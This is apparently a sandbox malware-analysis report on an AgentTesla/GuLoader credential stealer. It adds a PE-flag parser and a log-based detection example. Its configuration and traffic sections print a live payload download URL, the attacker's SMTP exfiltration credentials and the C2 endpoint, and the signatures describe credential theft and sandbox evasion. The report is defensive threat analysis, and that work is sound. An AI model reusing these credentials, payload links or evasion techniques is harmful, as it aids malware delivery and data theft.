Windows Analysis Report
FRACCIONAMIENTO 1722403906461L.exe

Overview

General Information

Sample Name: FRACCIONAMIENTO 1722403906461L.exe
Analysis ID: 612103
MD5: 04e8c57a5df1834c590c49ccc8734d6e
SHA1: b53b20975776cc58ed77d8bfff905303aa84391e
SHA256: 345aa66f6945c8fadee442f115591eaa694196c3ec207246814b5c90ab39df0a

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Outbound SMTP Connections
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: 00000003.00000000.15477945295.0000000000BC0000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E"}
Source: conhost.exe.956.4.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "titkarsag@ferdi.huQ1w2e3r4t5!mail.ferdi.hulucassevirus@gmail.com"}
Source: FRACCIONAMIENTO 1722403906461L.exe Virustotal: Detection: 27%
Source: FRACCIONAMIENTO 1722403906461L.exe ReversingLabs: Detection: 12%
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Finlandsrejserne
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
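The two static PE flag sets above (LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED in the COFF header; NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT in the optional header) contain a combination worth checking rather than reading past: DYNAMIC_BASE asks for ASLR, but RELOCS_STRIPPED means the image carries no relocations, so the loader cannot rebase it and it will always map at its preferred base. That is why the code-function addresses the report quotes (1_2_00405D74 and neighbours) are stable across runs. The following is an added example, not part of the Joe Sandbox report and not the sandbox's own tooling: a hand-rolled header parser that decodes both flag words and the base-relocation directory and points out the inconsistent combinations, plus a builder that emits a constructed minimal PE header carrying exactly the flags listed above so the check can be run offline. The flag constants are the documented IMAGE_FILE_* and IMAGE_DLLCHARACTERISTICS_* values; the builder output is a stand-in for the sample, not the sample itself.

```python
"""Static PE-flag check for the flag sets this report lists for the sample.

Hand-rolled header parser (no pefile dependency) plus build_min_pe(), which
produces a constructed minimal PE header carrying the given flags so the
parser can be exercised without the real file.
"""
import struct

FILE_CHARACTERISTICS = {          # IMAGE_FILE_* (COFF file header Characteristics)
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {           # IMAGE_DLLCHARACTERISTICS_* (optional header)
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
DIR_BASERELOC = 5                 # index of the base-relocation data directory


def parse_pe_flags(data):
    """Return (file_characteristics, dll_characteristics, reloc_dir_size) from raw PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    #              NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, _, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32: 96 fixed bytes before the data directories
        dirs = opt + 96
    elif magic == 0x20B:          # PE32+: 112 fixed bytes
        dirs = opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    reloc_size = 0
    if dirs + (DIR_BASERELOC + 1) * 8 <= opt + opt_size:
        _, reloc_size = struct.unpack_from("<II", data, dirs + DIR_BASERELOC * 8)
    return characteristics, dll_characteristics, reloc_size


def flag_names(value, table):
    return sorted(name for bit, name in table.items() if value & bit)


def assess(data):
    """Decode both flag words and note the combinations that matter for triage."""
    chars, dllchars, reloc_size = parse_pe_flags(data)
    report = {"file": flag_names(chars, FILE_CHARACTERISTICS),
              "dll": flag_names(dllchars, DLL_CHARACTERISTICS),
              "reloc_dir_size": reloc_size, "notes": []}
    if chars & 0x0001 and dllchars & 0x0040:
        report["notes"].append("DYNAMIC_BASE set but relocations stripped: the loader cannot "
                               "rebase this image, so ASLR does not apply despite the flag")
    if chars & 0x0001 and reloc_size:
        report["notes"].append("RELOCS_STRIPPED set but a base-relocation directory is present: "
                               "inconsistent header, look closer")
    return report


def build_min_pe(characteristics, dll_characteristics, reloc_size=0, pe32plus=False):
    """Constructed minimal PE header (no sections) with the given flags, for testing the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew: PE header right after DOS header
    fixed = 112 if pe32plus else 96
    opt_size = fixed + 16 * 8                             # 16 data directories
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<II", opt, fixed + DIR_BASERELOC * 8, 0x5000 if reloc_size else 0, reloc_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Flags exactly as the report lists them for this sample.
SAMPLE_FILE_FLAGS = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0100
SAMPLE_DLL_FLAGS = 0x0040 | 0x0100 | 0x0400 | 0x8000

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_min_pe(SAMPLE_FILE_FLAGS, SAMPLE_DLL_FLAGS)
    for key, value in assess(data).items():
        print(f"{key}: {value}")
```

Run it with a path to a PE file to assess a real image, or with no argument to assess the constructed header with the sample's flags. The relocation-directory check is the useful second opinion: a packer or installer stub that sets RELOCS_STRIPPED but leaves a .reloc directory behind (or the reverse) has usually been edited after linking.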

Networking

Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E
Source: Joe Sandbox View ASN Name: TARHELYHU
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 185.51.191.23
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache (this identical request was logged 19 times during the run)
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9ri2cnupcf3pilpptme4k7l2h/1650461475000/18066694053602596605/*/1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-0c-74-docs.googleusercontent.com | Connection: Keep-Alive
Source: global traffic TCP traffic: 192.168.11.20:49786 -> 185.51.191.23:587 (logged twice)
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 1103 | Content-Type: text/html; charset=UTF-8 | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" | Connection: close (18 such responses on Wed, 20 Apr 2022, Date headers 13:29:23, 13:29:32, 13:29:41, 13:29:51, 13:29:56, 13:30:05, 13:30:15, 13:30:23, 13:30:29, 13:30:36, 13:30:41, 13:30:50, 13:31:00, 13:31:08, 13:31:17, 13:31:23, 13:31:32 and 13:31:39 GMT)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (three such packets)
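The network observations above give a hunting team four concrete things to look for: a GET for the Google Drive payload URL carrying an IE11 user agent (Trident/7.0; rv:11.0) from a process that is not a browser, the same request repeated every few seconds against a stream of HTTP 403 replies, outbound TCP 587 to 185.51.191.23 (the AgentTesla SMTP exfil path the Sigma rule "Suspicious Outbound SMTP Connections" is aimed at), and the JA3 hash 37f463bf4616ecd445d4a1937da06e19. What follows is an added example written for this page, not part of the Joe Sandbox report and not its tooling: a small detection pass that applies those indicators to three constructed log feeds (proxy, flow, TLS) and grades each host. The log formats, host IPs 10.1.2.x, the process names, the mail-relay allowlist and the severity tiers are all assumptions made for the example. One caveat the grading encodes: a JA3 hash identifies the TLS client stack, and a hash produced by the Windows stack is shared with plenty of legitimate software, so a JA3 match alone is treated as corroboration and never alerts by itself.

```python
"""Detection pass over constructed log lines for the network indicators in this report.

Indicators from the report: the GuLoader payload URL on Google Drive, the IE11/Trident
user agent the download used, the repeated HTTP 403 replies, the AgentTesla SMTP
endpoint 185.51.191.23:587 and the JA3 hash. Log formats, host IPs, process names
and the mail-relay allowlist are assumptions made for this example.
"""
import re
from collections import Counter, defaultdict

# ---- indicators from the report -------------------------------------------
PAYLOAD_FILE_ID = "1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E"
PAYLOAD_URL = f"https://drive.google.com/uc?export=download&id={PAYLOAD_FILE_ID}"
EXFIL_IP, EXFIL_PORT = "185.51.191.23", 587          # SMTP exfil target (TARHELYHU)
MALWARE_JA3 = "37f463bf4616ecd445d4a1937da06e19"     # "seen in connection with other malware"
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
TRIDENT_UA = re.compile(r"Trident/7\.0; rv:11\.0\) like Gecko")
# ---- assumptions for this example -----------------------------------------
BROWSER_PROCESSES = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
MAIL_RELAY_ALLOWLIST = {"10.0.0.25"}     # hypothetical corporate relay
RETRY_THRESHOLD = 5                      # identical 403'd GETs before alerting
HIGH_CONFIDENCE = {"guloader-payload-url", "download-retry-loop", "agenttesla-smtp-exfil-endpoint"}


def proxy_hits(lines):
    """Proxy lines: ts, src_ip, process, method, url, status, user_agent (tab-separated)."""
    hits, retries = defaultdict(set), Counter()
    for line in lines:
        _ts, src, proc, _method, url, status, ua = line.rstrip("\n").split("\t")
        proc = proc.lower()
        if TRIDENT_UA.search(ua) and proc not in BROWSER_PROCESSES:
            hits[src].add(("trident-ua-from-non-browser", proc))
        if f"id={PAYLOAD_FILE_ID}" in url:
            hits[src].add(("guloader-payload-url", url))
        if url.startswith("https://drive.google.com/uc?export=download") and status == "403":
            retries[(src, proc, url)] += 1      # the loader re-requests the same URL after every 403
    for (src, proc, url), n in retries.items():
        if n >= RETRY_THRESHOLD:
            hits[src].add(("download-retry-loop", f"{n}x 403 for {url} from {proc}"))
    return hits


def flow_hits(lines):
    """Flow lines: ts, src_ip, dst_ip, dst_port, proto (space-separated)."""
    hits = defaultdict(set)
    for line in lines:
        _ts, src, dst, dport, proto = line.split()
        if proto != "tcp":
            continue
        if dst == EXFIL_IP and int(dport) == EXFIL_PORT:
            hits[src].add(("agenttesla-smtp-exfil-endpoint", f"{dst}:{dport}"))
        elif int(dport) in (25, 465, 587) and dst not in MAIL_RELAY_ALLOWLIST:
            hits[src].add(("outbound-smtp-to-unknown-server", f"{dst}:{dport}"))   # the Sigma rule's idea
    return hits


def tls_hits(lines):
    """TLS lines: ts, src_ip, dst_ip, ja3 (space-separated)."""
    hits = defaultdict(set)
    for line in lines:
        _ts, src, _dst, ja3 = line.split()
        if ja3.lower() == MALWARE_JA3:
            hits[src].add(("known-malware-ja3", ja3))    # corroboration only, never an alert by itself
    return hits


def run(proxy_lines, flow_lines, tls_lines):
    """Merge per-host hits and grade them; a JA3 match on its own stays at 'low'."""
    merged = defaultdict(set)
    for table in (proxy_hits(proxy_lines), flow_hits(flow_lines), tls_hits(tls_lines)):
        for src, reasons in table.items():
            merged[src] |= reasons
    result = {}
    for src, reasons in merged.items():
        names = {name for name, _ in reasons}
        if names & HIGH_CONFIDENCE:
            severity = "high"
        elif names - {"known-malware-ja3"}:
            severity = "medium"
        else:
            severity = "low"
        result[src] = {"severity": severity, "reasons": sorted(names), "details": sorted(reasons)}
    return result


# ---- constructed sample logs (retry timestamps follow the report's 403 replies) ----
_RETRY_TS = ["13:29:23", "13:29:32", "13:29:41", "13:29:51", "13:29:56", "13:30:05"]
PROXY_LOG = [f"2022-04-20T{t}Z\t10.1.2.30\tCasPol.exe\tGET\t{PAYLOAD_URL}\t403\t{IE11_UA}"
             for t in _RETRY_TS] + [
    "2022-04-20T13:31:00Z\t10.1.2.31\tchrome.exe\tGET\thttps://drive.google.com/uc?export=download"
    "&id=EXAMPLEFILEID\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/100.0.0.0",
]
FLOW_LOG = [
    "2022-04-20T13:32:10Z 10.1.2.30 185.51.191.23 587 tcp",   # the report's exfil endpoint
    "2022-04-20T13:32:11Z 10.1.2.31 10.0.0.25 587 tcp",       # allowlisted relay, no hit
    "2022-04-20T13:32:12Z 10.1.2.32 203.0.113.9 587 tcp",     # unknown relay, generic hit only
]
TLS_LOG = [
    "2022-04-20T13:29:20Z 10.1.2.30 142.250.186.174 37f463bf4616ecd445d4a1937da06e19",
    "2022-04-20T13:31:00Z 10.1.2.31 142.250.186.174 00000000000000000000000000000000",   # placeholder hash
]

if __name__ == "__main__":
    for host, info in sorted(run(PROXY_LOG, FLOW_LOG, TLS_LOG).items()):
        print(host, info["severity"], ", ".join(info["reasons"]))
```

The retry-loop rule is the one that survives after the payload URL is dead: the file id and the exfil IP will change with the next build, while a non-browser process polling a drive.google.com download link through 403 after 403 with an IE11 user agent is the loader's behaviour rather than its configuration.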
Source: CasPol.exe, 00000003.00000002.20397299424.000000001D33C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://GeLRtI.com
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17099903213.000000001C0E1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20398038371.000000001D3CB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20397764298.000000001D39E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://YCkYMz5eVEN7dA.org
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://YCkYMz5eVEN7dA.orgt-
Source: CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: CasPol.exe, 00000003.00000003.17282304601.0000000020183000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: CasPol.exe, 00000003.00000003.17282304601.0000000020183000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: FRACCIONAMIENTO 1722403906461L.exe String found in binary or memory: http://aia.mesince.com/ms-tsa.cer02
Source: FRACCIONAMIENTO 1722403906461L.exe String found in binary or memory: http://aia.mesince.com/ms.cer0
Source: CasPol.exe, 00000003.00000002.20397811168.000000001D3A2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372959813.00000000010AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372758608.000000000108C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: CasPol.exe, 00000003.00000002.20404063483.00000000200E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17282017189.00000000201CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CasPol.exe, 00000003.00000002.20397811168.000000001D3A2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372959813.00000000010AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372758608.000000000108C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: CasPol.exe, 00000003.00000002.20397811168.000000001D3A2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372959813.00000000010AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372758608.000000000108C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: media-removable.png.1.dr String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: CasPol.exe, 00000003.00000003.17282584231.00000000201D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281631999.00000000201D2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17282106098.00000000201D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.certigna.fr/ce
